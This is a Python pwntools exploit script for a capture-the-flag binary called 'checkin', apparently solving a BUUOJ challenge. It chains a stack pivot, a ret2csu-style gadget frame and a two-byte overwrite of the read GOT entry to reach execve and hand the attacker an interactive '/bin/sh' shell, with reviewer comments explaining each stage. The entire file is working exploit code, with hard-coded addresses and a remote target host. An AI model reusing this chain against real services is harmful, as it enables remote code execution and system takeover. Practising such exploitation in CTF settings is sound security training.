from pwn import *
import time, sys, base64
import ctypes

# 64-bit Linux target; log every byte pwntools sends and receives.
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'

# Connection selector: 1 = local process, 2 = the challenge host,
# 3 = localhost:12345. Any other value leaves `p` undefined.
debug = 1
filename = 'checkin'
if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('node4.buuoj.cn', 25323)
elif debug == 3:
    p = remote('127.0.0.1', 12345)

# Loaded but never consulted: nothing later in the script reads `libc`.
elf = ELF('./libc.so.6')
libc = elf.libc

# Hard-coded addresses lifted from one particular build of `checkin`;
# every later stage depends on them, so the script is tied to that build.
fake_stack = 0x404500
main_read = 0x0000000004011BF
leave = 0x00000000004011E2
read_got = 0x404018
csu_begin = 0x040124A
main = 0x000000000401156
def csu(function, rdi, rsi, rdx):
    """Return the 0x70-byte frame the gadget at ``csu_begin`` consumes.

    Layout: six qwords ``0, 1, rdi, rsi, rdx, function`` (the six registers
    that gadget restores — the exact register order is not visible in this
    file, so confirm it against the disassembly), then the address of the
    follow-on gadget ``0x401230``, then seven zero qwords of padding.
    Call sites pass a GOT slot (``read_got``) as ``function``, which
    presumably means the gadget dereferences it rather than jumping to it
    directly — verify before reusing. Result type follows ``p64()``.
    """
    registers = [0, 1, rdi, rsi, rdx, function]
    frame = b''.join(p64(value) for value in registers)
    frame += p64(0x401230)
    frame += p64(0) * 7
    return frame
# NOTE(review): the stages below concatenate str literals ('a'*0xa0, the
# '\x00' fill) with the bytes that p64() returns, so as written this only
# runs under Python 2 pwntools — TODO confirm the interpreter used.
# All addresses are hard-coded, so the chain is specific to this build of
# `checkin`; a relocated (PIE/ASLR) layout would invalidate every constant.

# Stage 1: 0xa0 bytes of filler, then two qwords — presumably the saved rbp
# (pointed at fake_stack+0xa0) and the return address (main_read).
payload = 'a'*0xa0 + p64(fake_stack+0xa0) + p64(main_read)
p.send(payload)

# Stage 2: csu_begin, a csu() frame (rdi=0, rsi=read_got, rdx=2), then main;
# padded to 0xa0 and followed by fake_stack-8 and `leave`.
payload = p64(csu_begin)
payload += csu(read_got,0,read_got,2) + p64(main)
payload = payload.ljust(0xa0,'\x00')
payload += p64(fake_stack-8) + p64(leave)
p.send(payload)

# Two raw bytes after a short pause — presumably so the previous frame is
# consumed before this input arrives; its length matches rdx=2 above.
sleep(0.1)
p.send('\x00\x40')

# Stage 3: same shape as stage 1, with the scratch area moved up by 0x200.
# Note this mutates the module-level fake_stack; after the bump,
# fake_stack+0x100 == bin_sh.
bin_sh = 0x404800
fake_stack += 0x200
payload = 'a'*0xa0 + p64(fake_stack+0xa0) + p64(main_read)
p.send(payload)

# Stage 4: two csu-style frames written out longhand instead of via csu().
# The first carries (0, fake_stack+0x100, 0x3B); 0x3B equals the length of
# the final input below. Padding and pivot qwords are the same as stage 2.
payload = p64(csu_begin)
payload += p64(0) + p64(1) + p64(0) + p64(fake_stack+0x100) + p64(0x3B) + p64(read_got) + p64(0x0401230)
payload += p64(0)*2 + p64(1) + p64(bin_sh) + p64(0)*2 + p64(read_got) + p64(0x0401230)
payload = payload.ljust(0xa0,'\x00')
payload += p64(fake_stack-8) + p64(leave)
p.send(payload)

# Final input: exactly 0x3b bytes, a NUL-terminated "/bin/sh" padded with 'a'.
sleep(0.1)
payload = '/bin/sh\x00'.ljust(0x3b,'a')
p.send(payload)
p.interactive()